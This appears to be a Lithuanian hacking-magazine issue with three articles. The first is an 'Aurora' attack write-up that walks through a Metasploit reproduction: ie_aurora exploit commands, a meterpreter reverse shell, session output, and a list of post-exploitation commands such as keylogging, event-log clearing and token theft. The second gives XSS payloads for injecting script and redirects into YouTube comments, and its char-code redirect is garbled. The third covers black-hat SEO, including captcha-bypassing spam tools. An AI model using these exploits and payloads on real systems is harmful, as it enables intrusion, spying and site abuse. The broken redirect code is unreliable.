Sausio 12 dieną Google , savo tinklaraštyje
paskelbė, kad tapo kibernetinių nusikaltėlių auka.
Tinklaraštyje taip pat buvo skelbiama, kad daugiau
nei 20 kompanijų nukentėjo nuo šių atakų. Kiti
šaltiniai teigia, kad nuo šių atakų nukentėjo
daugiau nei 34 organizacijos.
Atakos analizė
Google teigia, kad šios atakos metu buvo pavogta
jos inteleaktualinė nuosavybė. Kibernetiniai
nusikaltėliai labiau domėjosi prieigos gavimu prie
Gmail vartotojų paskyrų, kurios priklausė Kinijos
disidentams. Pagal Financial Times, dvi Ai
Weiwei Gmail paskyros buvo nulaužtos, jų turinys
perskaitytas ir nukopijuotas. Tačiau, kibernetiniai
nusikaltėliai peržiūrėjo tik dviejų Gmail paskirų
duomenis – laiškų temas ir Gmail paskyrų
sukūrimo datas.
McAfee saugumo ekspertai ištyrė,
kad ši ataka buvo įvykdyta per iki šiol nežinoma
Internet Explorer 6 naršyklės pažeidžiamumą.
Pažeidžiamumas paveikia Windows 2k, XP, 2003,
2008, Vista ir Se7en operacines sistemas. Praėjus
savaitei po McAfee paskelbto pranešimo apie šį
pažeidžiamumą Microsoft kompanija pripažino,
kad apie šį pažeidžiamumą jau žinojo nuo 2009m.
rugsėjo mėnesio... Tad klausimas, kodėl Microsoft
neužkamšė šio pažeidžiamumo ?
Kai sistema užkrečiama „Aurora“ atakos metu
paskleistu virusu, tuomet sukuriamas atgalinių
durų ryšys (backdoor). Šiuo ryšiu susijungiama
tarp aukos kompiuterio ir Ilinojaus,
Teksaso ir Taivano valstybėse esančių serverių.
Tuomet užkrėsta mašina pradeda tyrinėti
apsaugota bendrovės intranetą ieškodami kitų
pažeidžiamų sistemų bei intelektualinės
nuosavybės. Kibernetiniai nusikaltėliai šią ataka
nutraukė Sausio 4 dieną, po to kai Ilinojaus,
Teksaso ir Taivano serveriai buvo išjungti. Nėra
žinoma ar šiuos serverius išjungė kibernetiniai
nusikaltėliai ar serverių administratoriai. Tačiau ši
ataka buvo atnaujinta 2010m. vasario mėnesį.
Pažeidžiamumo panaudojimas
Pabandykime pakartoti visą atakos eigą naudodami
metasploit`ą. Tiesa, šiek tiek baugu bus skaityti
kaip pažeidžiamumas dirba ir kaip lengvai
kibernetinis nusikaltėlis gali kontroliuoti
pažeidžiamą sistemą.
Naudojama programinė įranga:
Metasploit Framework;
2 tinklo VMware, Win XP SP2 atvaizdai
(image);
TCPView.
Įdiegiame metasploit į vieną iš VMware
atvaizdų, kuris yra kaip hakerio kontroliuojama
sistema, įdiegimas atliekamas šiomis komandomis:
msf > use exploit/windows/browser/ie_“Aurora“msf exploit(ie_“Aurora“) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(ie_“Aurora“) > set LHOST 192.168.1.30LHOST => 192.168.1.30msf exploit(ie_“Aurora“) > set LPORT 6666LPORT => 6666msf exploit(ie_“Aurora“) > set URIPATH /URIPATH => /msf exploit(ie_“Aurora“) > Exploit
Atsakas, kuris parodo, kad serveris yra startavęs:[*] Exploit running as background job.msf exploit(ie_“Aurora“) >[*] Started reverse handler on port 6666[*] Using URL: http://0.0.0.0:8080/[*] Local IP: http://192.168.1.30:8080/ [*] Server started.
Kai pažeidžiamojoje sistemoje atidaroma
Internet Explorer interneto naršyklė ir įvedamas
serverio
IP adresas (mūsų atveju 192.168.1.30), tuomet
gaunamas atsakas:
[*] Sending Microsoft Internet Explorer "„Aurora“" Memory Corruption to client 192.168.1.57[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (192.168.1.30:6666 -> 192.168.1.57:1038) sessions -i 1[*] Starting interaction with
1... – komanda, kurios pagalba susijungiama su pažeista sistema.
Testuojant pažeistą sistemą
Jei pažeistoje sistemoje būtų tikrinami atviri
prievadai, būtų rasta išties įdomių dalykų. T. y.
būtų atrastas prievadas, kurį atidarė atgalinių durų
virusas.
Paveiksle matome atvira Internet Explorer
naršyklės prievadą, kuriuo naudojasi „Auroros“
atakos metu įveistas atgalinių durų virusas. Nėra
kito būdo kaip atpažinti ar sistema nulaužta ir
kontroliuojama iš nuotolinio serverio.
Kontroliuojant pažeistą sistemą
Komandos, kuriomis galima kontroliuoti pažeistą
sistemą:
? - Help menu
background - Backgrounds the current session
channel - Displays information about active
channels
close - Closes a channel
exit - Terminate the meterpreter session
help - Help menu
interact - Interacts with a channel
irb - Drop into irb scripting mode
migrate - Migrate the server to another process
quit - Terminate the meterpreter session
read - Reads data from a channel
run - Executes a meterpreter script
use - Load a one or more meterpreter extensions
write - Writes data to a channel
Stdapi tinklo komandos:
ipconfig - Display interfaces
portfwd - Forward a local port to a remote
service
Stdapi: vartotojo sąsajos komandos:
Enumdesktops - List all accessible desktops and
window stations
Idletime - Returns the number of seconds the
remote user has been idle
keyscan_dump - Dump they keystroke buffer
keyscan_start - Start capturing keystrokes
keyscan_stop - Stop capturing keystrokes
setdesktop - Move to a different workstation and
desktop
uictl - Control some of the user interfacecomponents
Stdapi: Failų sistemos komandos:
cat - Read the contents of a file to the screen
cd - Change directory
del - Delete the specified file
download - Download a file or directory
edit - Edit a file
getlwd - Print local working directory
getwd - Print working directory
lcd - Change local working directoryroute - View and modify the routing tablo
ls - List files
mkdir - Make directory
pwd - Print working directory
rm - Delete the specified file
rmdir - Remove directory
upload - Upload a file or directory
Stdapi: sistemos komandos:
clearev - Clear the event log
drop_token - Relinquishes any active
impersonation token.
execute - Execute a command
getpid - Get the current process identifier
getprivs - Get as many privileges as possible
getuid - Get the user that the server is running
kill - Terminate a process
lpwd - Print local working directory
ps - List running processes
reboot - Reboots the remote computer
reg - Modify and interact with the remote
registry
rev2self - Calls RevertToSelf() on the remote
machine
shell - Drop into a system command shell
shutdown - Shuts down the remote computer
steal_token - Attempts to steal an
impersonation token from the target process
sysinfo - Gets information about the remote
system.
Aukščiau pateikiau komandas, kurios gali
būti naudojamos norint kontroliuoti pažeistą
sistemą.
Pasaulis pasikeitė. Kiekvieną modelį dabar
reikia adaptuoti prie naujos realybės.
Administratoriai turi rūpintis visos įmonės
intelektualinės nuosavybės apsauga, privačių,
nefinansinių klientų informaciją.
Liepos mėnesio pradžioje youtube.com
tinklalapyje buvo atrastas XSS tipo
pažeidžiamumas. Išnaudojus šį pažeidžiamumą į
youtube.com tinklalapio komentarus galima įterpti
žalingą HTML kodą.
Panagrinėkime šį pažeidžiamumą iš arčiau.
Kad būtų galima į komentarų skiltį įterpti HTML
kalbą pirmiausia reikia „aktyvuoti“ HTML kalbą.
Tai atliekama komanda: <script>Pavyzdžiui:
<script><h1> aplankykite isauga.com – Šviesesnio rytojaus link <blink> <marquee><br> <br> Alone ’);”; </script>
Iššokantis (pop-up) reklaminis langas,
įterpiamas
pasinaudojus paprasta JavaScript kalbos komanda:
<script><BODY onLoad=”alert(‘aplankykite isauga.com - Alone’);”
jei norima nukreipti į kitą tinklalapį:<script>Zbody onLoad=”document.write(‘<script>window.location = String.fromCharCode(104,116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 105, 115, 61, 165, 67, 61, 46, 63, 6f, 6d);</script>’);”;
Įterpus šį kodą į youtube.com tinklalapį, jis persiųs jus į www.isauga.com tinklalapį
Pradedame nuo pat pradžių. Kas yra SEO ?
Su kuo jis valgomas ir apskritai apie ką aš kalbėsiu
? Supažindinant skaitytojus su šiomis
technologijomis pateikiu šiek tiek sausos teorijos
kurią galite rasti paprasčiausioje Wikipedijoje. O
tie, kurie žino, kas yra SEO ir kuo skiriasi white-
hat SEO nuo black-hat SEO siūlyčiau praleisti šio
straipsnio dalį ir skaityti toliau.
Optimizavimas paieškos sistemoms (angl.
Search Engine Optimization, trump. SEO) -
Interneto tinklapių projektavimo metodologija,
siekiant aukščiausių tinklalapio pozicijų paieškos
sistemų rezultatuose. Dažnu atveju SEO yra
klaidingai tapatinamas su marketingu paieškos
sistemose (angl. Search Engine Marketing, trump.
SEM). Populiariausias ir daugeliui žinomas SEM
įrankis yra Google "AdWords". SEO skirstomas į
du tipus: leidžiamas paieškos sistemų bei
draudžiamas (angl. white-hat SEO bei black-hat
SEO).
Naudojant nelegalius tinklalapio optimizavimo
paieškos sistemoms būdus, svetainė anksčiau ar
vėliau bus pašalinta iš paieškos sistemų rezultatų
puslapių (angl. Search Engine Result Page, trump.
SERP). Blackhat metodai
dažniausiai yra naudojami interneto sukčių,
kibernetinių nusikaltėlių bei kitų piktavalių.
SEO faktorių, lemiančių tinklalapio pozicijas
paieškos sistemose, 2009 metais buvo daugiau
kaip 200.
Sistemų algoritmai nėra viešinami, siekiant
išvengti manipuliavimo jais.
Išskiriamos dvi SEO dalys - vidinis SEO bei
išorinis SEO. Vidinio SEO metu svetainėje
atliekami techniniai tinklapio optimizavimo darbai,
todėl paieškos sistemos lengviau analizuoja ir
suvokia svetainėje esantį turinį.
Išorinio SEO metu dažniausia stengiamasi į
svetainę pritraukti kuo daugiau nuorodų pagal tam
tikrus kriterijus. (straipsnis iš Wikipedijos: Aut.
Pstb.) .
Išsamiai apie Black Hat SEO
Black Hat paieškos sistemų optimizavimas
paprastai apibrėžiamas nelegaliais metodais, kurie
naudojami norint paieškos sistemoje gauti
tinklalapio aukštesnio lygio reitingą. Naudojant šį
metodą dažniausia apimamos šios technikos:
Laužomos paieškos sistemų taisyklės bei
reglamentai;
Neetiškai pateikiamas tinklalapio turinys.
Dažniausiai vizualiu (matomu) ar nevizualiu
(nematomu) metodu tiek paieškos vorams,
tiek paieškos sistemų naudotojams.
Naudojantis Black Hat SEO galite gauti
nebent tik trumpalaikės naudos, tačiau jei jūs šia
technika naudositės savo tinklalapyje ir platinsite
šlamštą,
tuomet iš paieškos sistemų robotų galite susilaukti
griežtos bausmės. O jie, patikėkite, tikrai nesigaili.
Paslėptas turinys
Viena iš labiausiai naudojamų black Hat
SEO technikų yra turinio slėpimas. Paslėptas
tinklalapio turinys būna įvairias pavidalais, tačiau
pats pagrindinis
<noscript>Imaginary Car Hire Firm do Car Hire which is very affordable so if you want to hire a carcall our car hire firm because we are the best car hire firm in the world</noscript>
principas yra tai, kad per paslėptą turinį
svetainėje prikišama įvairiausių žodžių, kurių
vartotojai nemato, tačiau suindeksuoja paieškos
sistemų robotukai.
Paslėpti turinį galima naudojant
komentavimo tagus (gaires). Komentavimo tagai
atrodo maždaug taip:
<!-- komentavimo tegas --> , arba // komentavimo tegas .Jei norima paimti ne vieną eilutę:
/* komentavimo tegas komentavimo tegas komentavimo tegas */
Realiai, komentavimo tagai yra skirti
programuotojams pažymėti tam tikrą kodo dalį.
Teisingai naudojami komentavimo tagai: <!–Pagrindinio turinio pradžia –>. O taip
komentavimo tagai naudojami nekorektiškai: <!—Search engine optimisation, SEO,professional search engine optimisationcompany, spamming search enginės, Viagra,porn, shop –>
Kitas populiarus būdas paslėpti tam tikrą turinį tai
naudoti <noscript> tagą. Iš tiesų šis tagas tūrėtų
būti naudojamas norint informuoti vartotojus, kad
tam tikras scenarijus (skriptas) yra naudojamas,
bet jų interneto naršyklė nepalaiko šio scenarijaus.
Kad padidintų svetainės lankomumą bei
populiarumą kibernetiniai nusikaltėliai šį tagą
naudoja kaip viena iš šlamšto technikų,.
Teisingai naudojamo <noscript> tago pavyzdys:<script type=”text/javascript”><!–document.write(“Hello World!”)//–></script><noscript>Jūsų interneto naršyklė nepalaiko JavaScript!</noscript>
Neteisingai naudojamo <noscipt> pavyzdys:
<noscript>Imaginary Car Hire Firm do Car Hire which is very affordable so if you want to hire a carcall our car hire firm because we are the best car hire firm in the world</noscript>
Taip pat gali būti naudojami kiti HTML kalbos
tagai: <input type=”hidden”> , <noframes>Neverta apsiriboti vien tik HTML kalba,
dar galima naudoti ir CSS - pakopinio stiliaus
kalbos tagus. Slepiamas tekstas, kuris turi lygiai
tokia pačia spalvą kaip ir tinklalapio fonas, arba
naudojamos labai mažos raidės, kurių naudotojas
nepamato. Pavyzdžiui, raudonu šriftu užrašytas
tekstas nėra matomas raudoname tinklalapio fone,
arba naudojamos vos 1 mm. Raidės kurių
naudotojas paprastai neįžiūri, tačiau tiek parašytas
tekstas turintis tą pačia spalvą, tiek labai mažas
tekstas yra naudojamas tinklalapyje ir
suindeksuojamas paieškos robotų.
Jei netyčia, ar to nežinant naudojatės tokiomis
technikomis siūlyčiau kuo greičiau jų atsisakyti,
nes jūsų tinklalapis gali būti užblokuojamas
paieškos sistemų.
Meta raktažodžiai
Meta dalies raktažodžiai (keywords) tūrėtų
būti trumpas žodžių sąrašas, kuris tūrėtų atspindėti
tinklalapio temą. Turėtumėte nepiktnaudžiauti
meta raktažodžiais, nes paieškos sistemos jau
„išmoko“ patikrinti juos.
Taisyklingai naudojami raktažodžiai:<meta name=”Keywords” content=”Online marketing, digital marketing, searchmarketing, search engine marketing, e-mail marketing, SEO” />
Netaisyklingai naudojami raktažodžiai:<meta name=”keywords” content=” Restaurant, restaurants, food, feed, take away food, fastfood,junk food, eat, eating out, dinner, dining, meal, eating, MadeUp, steak and chips,chicken and chips, pie and chips, pudding, desert, big restaurant,small restaurant, bestrestaurant, great restaurant, exclusive restaurant, cocktails, wine,drink, pizza,sandwhiches ”>
Meta raktažodžių užkimšimas
Pagrinde yra du meta tagai, kuriais
naudojamasi informuoti paieškos sistemas, koks
tinklalapio turinys pateikiamas. Šie tagai yra tarp
tinklalapio <head></head> dalių.
Ir kai netinkamai būna aprašyti raktažodžiai,
paieškos robotukai perspėja savo paieškos
sistemas, kad tas tinklalapis naudoja neleistina
SEO techniką. Meta taguose tūrėtų būti aprašyta
tai, kas pateikiama tinklalapio turinyje, ne daugiau
nei 1 ar 2 sakiniai.
Taisyklingas meta aprašymas:
<meta name=”description” content=”PushON are an Online Marketing agency providing a fullrange of digital marketing services throughout Greater Manchester and the North West UK.If you need Search Enginemarketing (SEM), Search Engine Optimisation (SEO) or Pay per Click (PPC), we can helpyou. Contact us now.” />
Netaisyklingas meta aprašymas:<meta name=”description” content=”MadeUp restaurant website is the best MadeUp restaurantwebsite, our restaurant is better than any restaurant,great restaurant,best foodrestaurant,visit our restaurant” />
Įšėjimo bei atėjimo puslapiai
Tokio tipo puslapiai dažniausiai yra sukurti tik
paieškos sistemoms, ne tinklalapio skaitytojams. Iš
tiesų tai netikri, suklastoti puslapiai, kuriuose
prikemšama ir naudojama aukšto reitingo vienas
ar du raktažodžiai kurie atveda į šį tinklalapį.
Tinklalapio lankytojai niekada nepamatys šio
puslapio, nes naudotojas užėjęs į šį tinklalapio
puslapį automatiškai persiunčiamas į kitą
tinklalapį, be galimybės jį pamatyti.
Nuorodų fermos
Nuorodų fermos tai visiems prieinami, nemokami
tinklalapiai (Free For All [FFA]), kurie neturi
pagrindinio tikslo, kaip tik teikti nuorodas į kitus
tinklalapius. Jie nesuteikia jums kažkokio
papildomo srauto. Talpindami nuorodas tokiuose
tinklalapiuose rizikuojate, kad jūsų tinklalapis gali
būti išmestas iš paieškos sistemų. Neretai, SEO
optimizavimu užsiimančios įmonės, kurios nežino
apie ką kalba, naudoja specialias SEO
optimizacijos programas, kurios skatina tokių
puslapių kūrimą. Paieškos vorai jau sugeba
atpažinti tokius tinklalapio puslapius ir geba juos
ignoruoti, arba dar blogiau, gali jūsų tinklalapį
pažymėti netinkamu ir užblokuoti jį paieškos
sistemoms.
Įrankiai
Daugelis, užsiimančių Black Hat SEO
technikomis stengiasi nesitepti rankų ir visą darbą
paversti į automatizuotą sistemą, būtent tam ir yra
naudojamos specialios programos, kurios už juos
atlieka visus darbus. Viena iš tokių programų tai
Xrumer. Šios programos dėka iš forumų,
tinklaraščių, ir svečių knygų į savo tinklalapį galite
gauti tūkstančius atgalinių nuorodų. Šių nuorodų
dėka tinklalapio puslapiavimo reitingas ženkliai
šokteli aukštyn.
Xrumer programa geba išplatinti norimą tinklalapį
per 100.000 forumų, tinklaraščių ar svečių knygų,
kiekvienoje iš jų palikdamas po nuorodą .
Trumpas apibrėžimas – Xrumer tai profesionali,
aukštos kokybės programa, kuri geba automatiškai
sudaryti nuorodas. Vos per kelias dienas norimas
tinklalapis šoktels Google reitinguose į topus.
Šis įrankis mėgstamas tiek naujokų, tiek
profesionalų todėl, kad Xrumer yra labai galinga
bei efektyvi programa. Tačiau čia pasakos ir
pasibaigia, nes programa kainuoja 540$. Žinoma
juodųjų skrybelių hakeriai ją, įvairiuose P2P tipo
tinkluose, randa „nulaužtą“, tačiau neverta
susigundyti lengvu grobiu, nes 90% P2P tinkluose
esančių programų kurių pavadinimai - Xrumer yra
ne kas kita kaip Trojos arkliai bei kiti virusai
(išbandyta!).
Ką siūlo programa:
Šimtu tūkstančių nuorodų į tinklalapį.;
Automatizuotą SEO darbą.;
Greita pakilimą paieškos sistemose;
Aukštą tinklalapio reitingavimą.
Dar daugiau, ji turi begalę kitų nustatymų:
Links counter – Pasirinkus norimą
duomenų bazę iš Links aplankalo, gali suskaičiuoti
kiek nuorodų yra faile / duomenų bazėje.
Links post-processing. Geba sutvarkyti nuorodas
esančias duomenų bazėje. T. y iš
http://link.com/index.php? Paverčia į
http://link.com/index.php .
Delete duplicated links – Jau pats
pavadinimas pasako. Ištrina pasikartojančias
nuorodas esančia duomenų bazėje.
Links database analysis – Tai labai
galingas ir naudingas įrankis. Jis tikrina žinutes,
kurias pavyko įterpti į forumus, ir stebi kiek šių
žinučių ištrynė forumų moderatoriai.
Graphics reports – Šis įrankis leidžia grafiškai
atvaizduoti forumuose, tinklaraščiuose, svečių
knygose sėkmingai patalpintas žinutes.
Taip pat geba procentaliai atvaizduoti tas
žinutes, kurios dar laukia patvirtinimo bei domenų
zonas, forumų naudojamas sistemas bei svečių
knygas. Ataskaitos pateikiamos grafiniu arba
diagramų būdu.
Be visų aukščiau išvardintų savybių, taip pat
galima programą susikonfigūruoti taip, kad ji
siųstų reklamines žinutes per proxy prievadus,
apeiti grafines captcha apsaugas. Numatyta
galimybė tik užsiregistruoti forumuose ir nesiųsti
jokių reklaminių žinučių arba atvirkščiai,
užsiregistruoti ir patalpinti žinutes, netgi galimybė
forumuose užsidėti savo norimą avatarą nors ne
itin naudinga savybė, tačiau vis tiek įdomu kad
tokia savybė teikiama.
Kita, ne mažiau menkesnė, o gal net
geresnė programa tai - SEO Power Suite. Tiksliau
tai programa susidedantį iš keturių kitų
paprogramų:
LinkAssistant;
Rank Tracker;
SEO SpyGlass;
WebSite Auditor.
SEO Power Suite turi tiek mokamą, tiek
nemokamą versija.
Nemokamoje versijoje apkarpytos kai
kurios funkcijos, kurios jums neleis sklandžiai
dirbti, tačiau nereikia norėti, kad viskas būtų
pateikiama ant lėkštutės.
Apie kiekvieną paprogramę konkrečiai.
LinkAssistant – Tai labai įdomus įrankis,
kuris pagal norimą užklausą geba atrasti
tinklalapio partnerius ir pateikti partnerių kontaktų
detales.
LinkAssistant geba atrasti aukšto reitingavimo
tinklalapius panašius į jūsų, ir juose iškapstyti
susisiekimo detales t. y. elektroninį paštą.
Galimybė pačiam sugeneruoti nuorodų direktorijų
kategorijas bei subkategorijas, bei jas įkelti į
tinklalapį. Įdomiausia yra tai, kad susisiekti su kito
tinklalapio savininku galima tiesiai iš programos,
nes ji turi ne tik elektroninio pašto dėžutę, bet ir
interneto naršyklę... LinkAssistant programa
suteikia galimybę stebėti nuorodų populiarumą.
Tiesa sakant, naudodamas šia programa užmiršau
apie kitus FTP klientus.
Rank Tracker – Tai programa kuri gali būti labai
naudinga, jei norite automatiškai tikrinti
tinklalapio reitingavimą bei stebėti tinklalapio
poziciją paieškos sistemoje,
Rank Tracker turi papildomą įskiepį (komponentą)
kuris padeda „pasiūlyti“ geresnius raktažodžius.
Tiesa sakant ,šioje paprogramoje yra net 11
skirtingų raktažodžių, siūlymo įrankių. Rank
Tracker Palaiko 663 paieškos sistemas. Dar
daugiau, programa suteikia galimybę stebėti
norimo tinklalapio reitingavimą. Galimybė
parodyti geriausius raktažodžius, kurie
optimizuotų tinklalapį.
T. y. programa paima raktažodžius su kuriais
daugiausiai ieškoma paieškos sistemose ir pagal
jūsų tinklalapio esmę pasiūlo geresnius
raktažodžius
SEO Spy Glass – Tai programa, kuri gali šnipinėti
tinklalapio atgalines nuorodas, bei gauti detalesne
informacija apie paliktas nuorodas. Šis įrankis
geba išanalizuoti nuorodas 428 vietinėse ir
pasaulinėse paieškos sistemose.
Geba atspausdinti atgalinių nuorodų sąrašą bei gali
išsiųsti elektroniniu paštu ar publikuoti internete.
Tai labai naudingas įrankis stebėti atgalinių
nuorodų ryšiams bei nustatyti kurie tinklalapiai
gerai reitinguojami, o kuris ne taip gerai.
Paskutinę ir tikrai neprasčiausia programa tai
WebSite Auditor.Šios programos dėka galima
lengvai optimizuoti viso tinklalapio turinį ir jį
„patraukliai“ pritaikyti paieškos sistemoms. Tai
vienintelė programa kuri leidžia optimizuoti
tinklalapį dviem lygiais – pačio tinklalapio
(domeno) ir puslapių (turinio). Optimizuojant šiais
dviem metodais norimas tinklalapis greitai atsidurs
paieškos sistemos pirmuosiuose puslapiuose.
Konkrečiau kalbant, atsižvelgiant į įvairius SEO
faktorius šis įrankis geba viename lange
išanalizuoti visą tinklalapį, pateikiant visus
surinktus duomenis.
WebSite Auditor gali padėti atrasti bei
pataisyti:
Neveiksmingas nuorodas;
HTML kodo klaidas;
Dubliuotą turinį;
404 ir kitų serverių atsako klaidas;
Ne indeksuotus tinklalapio
puslapius;
Prarastus ar per ilgus meta
aprašymus;
Bei kitus faktorius kurie gali įtakoti tinklalapio
reitingavimą.
Šiam kartui tiek.
Pageidavimus, pastabas, siūlymus galite siųsti
nurodytu el. paštu.
Dėl reklamos visi klausimai derinami el. paštu arba
skype programa.
KITO NUMERIO TEMOS
20 Windows slaptų triukų, kurių neperskaitysite niekur kitur;
Ar Google XXI amžiaus priešas ?
Laužimai pasitelkiant Google sistemą, ką Googlegali išduoti apie jus ?